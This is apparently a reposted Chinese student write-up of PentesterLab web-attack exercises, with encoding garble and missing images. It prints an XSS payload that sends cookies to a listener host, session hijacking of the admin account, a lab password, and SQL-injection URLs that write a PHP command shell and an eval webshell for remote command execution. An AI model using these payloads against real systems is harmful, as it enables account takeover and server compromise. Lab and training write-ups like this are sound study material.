web 攻击靶机解题过程
sql注入靶機(jī)攻擊過(guò)程請(qǐng)參考
https://pentesterlab.com/exercises/from_sqli_to_shell/course
http://www.sohu.com/a/126855490_472906
xss靶機(jī)的攻擊過(guò)程請(qǐng)參考
https://pentesterlab.com/exercises/xss_and_mysql_file/course
實(shí)驗(yàn)一
?
?
?
?
再用菜刀連接即可
?
?
實(shí)驗(yàn)二
?
在機(jī)器上打開(kāi)網(wǎng)頁(yè):
?
測(cè)試下是否存在xss漏洞。
發(fā)現(xiàn)提交后有彈出框:
?
進(jìn)一步構(gòu)造內(nèi)容
<script>document.write('<img src="http://192.168.179.142/?'+document.cookie+' "/>');</script>同時(shí)在192.168.179.142機(jī)器上用nc打開(kāi)80端口。
?在原來(lái)機(jī)器上登陸admin賬戶,密碼是p4ssw0rd
?
獲取到cookie信息。
復(fù)制下cookie,在142機(jī)器上打開(kāi)評(píng)論所在的網(wǎng)頁(yè)。并修改cookie的值為剛才復(fù)制的值。
刷新下頁(yè)面,發(fā)現(xiàn)已經(jīng)已a(bǔ)dmin的身份登錄進(jìn)頁(yè)面中。
進(jìn)入管理界面后,發(fā)現(xiàn)博客編輯界面存在sql注入漏洞。
?
可以讀取passwd文件,但是不能讀取shadow文件。我們嘗試能不能創(chuàng)建一個(gè)文件。
在編輯頁(yè)面發(fā)現(xiàn)錯(cuò)誤提示中有/var/www/classes 目錄,
?
在查看源碼時(shí)發(fā)現(xiàn)有css目錄
嘗試后發(fā)現(xiàn)/var/www/css 目錄可寫。
于是構(gòu)造語(yǔ)句:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22
然后打開(kāi)
http://192.168.179.130/css/s.php
顯示:
說(shuō)明s.php文件成功寫入到/var/www/css 目錄,下面將
<?php system($_GET['c']); ?>
寫入z.php中,構(gòu)造url為:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22
訪問(wèn)z.php,并使用uname -a獲取系統(tǒng)信息??梢赃h(yuǎn)程執(zhí)行命令。
下面寫入一句話木馬,構(gòu)造url:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22
菜刀鏈接:
?
轉(zhuǎn)載于:https://www.cnblogs.com/p201521410046/p/8906282.html
與50位技術(shù)專家面對(duì)面20年技術(shù)見(jiàn)證,附贈(zèng)技術(shù)全景圖總結(jié)
以上是生活随笔為你收集整理的web 攻击靶机解题过程的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 划船训练常见错误:含胸驼背肩胛骨活动不足
- 下一篇: 20155216 Exp5 MSF基础应